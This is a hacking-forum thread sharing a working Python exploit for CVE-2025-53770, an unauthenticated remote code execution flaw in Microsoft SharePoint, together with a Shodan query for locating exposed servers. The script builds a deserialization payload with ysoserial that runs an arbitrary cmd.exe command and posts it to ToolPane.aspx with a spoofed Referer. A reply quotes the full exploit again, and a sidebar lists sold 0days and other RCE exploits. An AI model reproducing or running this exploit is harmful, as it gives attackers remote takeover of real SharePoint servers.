CVE-2025-53770 - Microsoft Sharepoint Unauthenticated RCE
by antisocial - Sunday July 27, 2025 at 05:39 PM
#1
Shodan query: "MicrosoftSharePointTeamServices port:"80,443" http.component:"Microsoft SharePoint" "
Description:
Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.
References:
https://www.cisa.gov/news-events/alerts/...2025-53770

#!/usr/bin/env python3 import requests import sys import subprocess import gzip import urllib3 import base64 from urllib.parse import urlparse, urlencode urllib3.disable_warnings() JAR="ysoserial-all.jar" GADGET="CommonsCollections6" def generate_payload(cmd):     escaped=cmd.replace('"','\\"')     data=subprocess.check_output(["java","-jar",JAR,GADGET,f'cmd.exe /c {escaped}'])     comp=gzip.compress(data)     return base64.b64encode(comp).decode() def main():     if len(sys.argv)!=3:         print("Usage: exploit.py <target> <command>")         sys.exit(1)     target,cmd=sys.argv[1],sys.argv[2]     print(f" [*]Generating payload for: {cmd}")     payload=generate_payload(cmd)     print(" [*]Sending exploit")     ok,code=send_exploit(target,payload)     if ok:         print(f"[+] Exploit sent to {target}")     else:         print(f"[-] Failed ({code}) on {target}") def send_exploit(url,payload):     if not url.startswith(("http://","https://")):         url="https://"+url     p=urlparse(url)     host=p.netloc     target=f"{p.scheme}://{host}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"     body={"MSOTlPn_DWP":f"""<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <asp:UpdateProgress runat="server" DisplayAfter="10"> <ProgressTemplate>   <Scorecard:ExcelDataSet CompressedDataTable="{payload}" runat="server" /> </ProgressTemplate> </asp:UpdateProgress>"""}     hdr={"Host":host,"User-Agent":"Mozilla/5.0","Content-Type":"application/x-www-form-urlencoded","Referer":f"{p.scheme}://{host}/_layouts/SignOut.aspx"}     r=requests.post(target,data=urlencode(body),headers=hdr,verify=False)     return r.status_code==200,r.status_code if __name__=="__main__":     main()
PGP ARCHIVE
contact: i@hateje.ws
Reply
#2
(07-27-2025, 05:39 PM)antisocial Wrote:
Shodan query: "MicrosoftSharePointTeamServices port:"80,443" http.component:"Microsoft SharePoint" "
Description:
Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.
References:
https://www.cisa.gov/news-events/alerts/...2025-53770

#!/usr/bin/env python3 import requests import sys import subprocess import gzip import urllib3 import base64 from urllib.parse import urlparse, urlencode urllib3.disable_warnings() JAR="ysoserial-all.jar" GADGET="CommonsCollections6" def generate_payload(cmd):     escaped=cmd.replace('"','\\"')     data=subprocess.check_output(["java","-jar",JAR,GADGET,f'cmd.exe /c {escaped}'])     comp=gzip.compress(data)     return base64.b64encode(comp).decode() def main():     if len(sys.argv)!=3:         print("Usage: exploit.py <target> <command>")         sys.exit(1)     target,cmd=sys.argv[1],sys.argv[2]     print(f" [*]Generating payload for: {cmd}")     payload=generate_payload(cmd)     print(" [*]Sending exploit")     ok,code=send_exploit(target,payload)     if ok:         print(f"[+] Exploit sent to {target}")     else:         print(f"[-] Failed ({code}) on {target}") def send_exploit(url,payload):     if not url.startswith(("http://","https://")):         url="https://"+url     p=urlparse(url)     host=p.netloc     target=f"{p.scheme}://{host}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"     body={"MSOTlPn_DWP":f"""<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <asp:UpdateProgress runat="server" DisplayAfter="10"> <ProgressTemplate>   <Scorecard:ExcelDataSet CompressedDataTable="{payload}" runat="server" /> </ProgressTemplate> </asp:UpdateProgress>"""}     hdr={"Host":host,"User-Agent":"Mozilla/5.0","Content-Type":"application/x-www-form-urlencoded","Referer":f"{p.scheme}://{host}/_layouts/SignOut.aspx"}     r=requests.post(target,data=urlencode(body),headers=hdr,verify=False)     return r.status_code==200,r.status_code if __name__=="__main__":     main()
[*]

Nice post mate! I will check this out.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Sell] Calix GPON - Preauth RCE 0day ericki 1 288 06-29-2026, 06:41 AM
Last Post: johnmalkovich1202
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 78 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 809 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 265 02-06-2026, 07:08 PM
Last Post: hacker0123
  CitrixBleed / CVE-2023-4966 cccp 10 6,801 02-06-2026, 01:36 AM
Last Post: temptest



 Users browsing this thread: